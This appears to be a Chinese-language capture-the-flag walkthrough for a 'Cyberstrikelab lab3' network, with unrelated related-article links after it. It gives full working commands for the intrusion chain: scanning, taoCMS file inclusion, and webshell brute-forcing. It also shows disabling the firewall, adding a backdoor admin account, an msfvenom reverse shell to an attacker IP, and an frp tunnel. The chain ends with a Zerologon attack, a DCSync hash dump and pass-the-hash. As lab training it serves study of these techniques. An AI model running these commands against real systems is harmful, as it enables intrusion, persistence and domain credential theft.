当前位置: 首页 > news >正文

【Cyberstrikelab】lab3

主机扫描

sudo nmap -sS --min-rate 10000 -f 192.168.10.0/24 -oN lab3.txt

发现两台主机

192.168.10.10

对192.168.10.10进行详细的漏洞扫描

sudo nmap -sS --min-rate 10000 -f -p-  192.168.10.10  -oN lab3-192.168.10.10-ports.txt

taocms 3.0.1 本地文件泄露漏洞(CVE-2021-44983)

挨个尝试,发现3590端口是一个taoCMS

下面有一个管理口

查看源代码,发现有出现默认的账号密码

可以直接成功登录

本地文件包含得到flag1

根据提示说木马留在主页,打开文件管理系统,查看index.php文件的内容,发现木马

通过文件管理写webshell

生成一个免杀马

发现是system权限

关闭防火墙&添加用户&开启远程桌面

netsh advfirewall set allprofiles state off
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user dfz 123@abc /add
net localgroup Administrators dfz /add

rs dfz /add

内网信息收集

发现192.168.20.0/24网段,并且没有域信息

fscan

通过远程桌面将fscan拖入到192.168.10.10进行内网扫描

发现还有192.168.20.20,192.168.20.30主机

上线MSF(冰蝎自带)

这里直接使用冰蝎的反弹shell功能

先用msf配置监听,注意这里要使用php的反弹shell payload

在冰蝎的解密填写好kali的主机IP和监听端口,点击连接

就可以得到shell

冰蝎反弹的不稳定,后面会断

上线MSF

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=6000 -f exe -o win10.exe

这里直接用远程桌面拖入并运行,得到shell

迁移进程

搭建内网隧道

kali的配置文件,frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000

win10的配置文件,frpc.ini

[common]
server_addr = 172.16.233.2
server_port = 7000[socket]
type = tcp
remote_port = 8000
plugin = socks5 

配置下proxychasin4文件

192.168.20.20

刚开始扫描到192.168.20.20开放端口不多,这里使用fscan对192.168.20.20进行全端口扫描

Thinkphp

配置下kali的代理

然后访问8055得到thinkphp

但是没扫出什么漏洞

网页提示说,已经有木马的存在

webshell密码爆破

proxychains4 python2 awBruter.py -u "http://192.168.20.20:8055/index.php"

使用蚁剑连接

可以看到果然主页上存在一句话(PS:这里必须要用蚁剑来连接,冰蝎和哥斯拉因为是有加密的无法连接这个普通webshll)

找到flag

收集内网信息

对192.168.20.20收集内网信息,发现就只有这台电脑。但是存在域

192.168.20.30

使用fscan对192.158.20.30进行全方面的端口扫描

尝试ms17_010

尝试使用ms17_010,发现不行

CVE-2020-1472

使用mimikatz攻击

借助mimikatz.exe来进行攻击,使用zerologon漏洞进行置空

# cyberstrikelab.com是域
# WIN-7NRTJO59O7N$是一个域成员
mimikatz.exe "lsadump::zerologon /target:cyberstrikelab.com /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit" "exit"

然后导出域管理hash

mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com /user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:\"\" /authntlm" "exit"

500    Administrator    f349636281150c001081894de72b4e2b    51

使用相关脚本攻击

也可以使用相关脚本进行攻击(https://github.com/dirkjanm/CVE-2020-1472)

将域密码置空

proxychains4 python3 cve-2020-1472-exploit.py WIN-7NRTJO59O7N  192.168.20.30

导出管理员hash

proxychains4 python3 secretsdump.py cyberstrikelab.com/WIN-7NRTJO59O7N\$@192.168.20.30  -no-pass -just-dc

PTH攻击

使用刚刚得到的Administrator的has进行PTH攻击

psexec.py在impacket的examples中

proxychains4 -q python3 psexec.py -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30

http://www.dtcms.com/a/264399.html

相关文章:

  • AngularJS 安装使用教程
  • 转矩常数KT
  • 什么是数据孤岛?如何解决数据孤岛问题?
  • Wisdom SSH 与宝塔面板:深度对比剖析
  • 机器学习在智能教育中的应用:个性化学习路径与学习效果评估
  • socket编程
  • JavaEE线程概念
  • Git 运行.sh文件
  • js filter()
  • Linux 终止进程
  • 【ArcGIS】矢量数据的叠加分析
  • 面试拷打-20250701
  • LLM面试12
  • vite项目中引入tailwindcss,难倒AI的操作
  • day48
  • 目前最火的agent方向-A2A快速实战构建(二): AutoGen模型集成指南:从OpenAI到本地部署的全场景LLM解决方案
  • C语言实战:2048数字合并游戏
  • 【C++】头文件的能力与禁忌
  • [Python 基础课程]数字
  • wrap+aria2c提高下载速度
  • 创宇智脑 MCP 赋能 AiPy,IP 风险调查效率实现 10 倍飞跃,威胁分析一键生成
  • c语言中的函数I
  • NV103NV105美光固态闪存NV107NV108
  • Python OrderedDict 用法详解
  • 【1.7 漫画Java核心并发编程】
  • 【硬核拆解】英伟达Blackwell芯片架构如何重构AI算力边界?
  • 第六章 OpenCV篇—傅里叶变换与直方图
  • 学习字符串
  • Flask+LayUI开发手记(十):构建统一的选项集合服务
  • Rust 定义与实例化结构体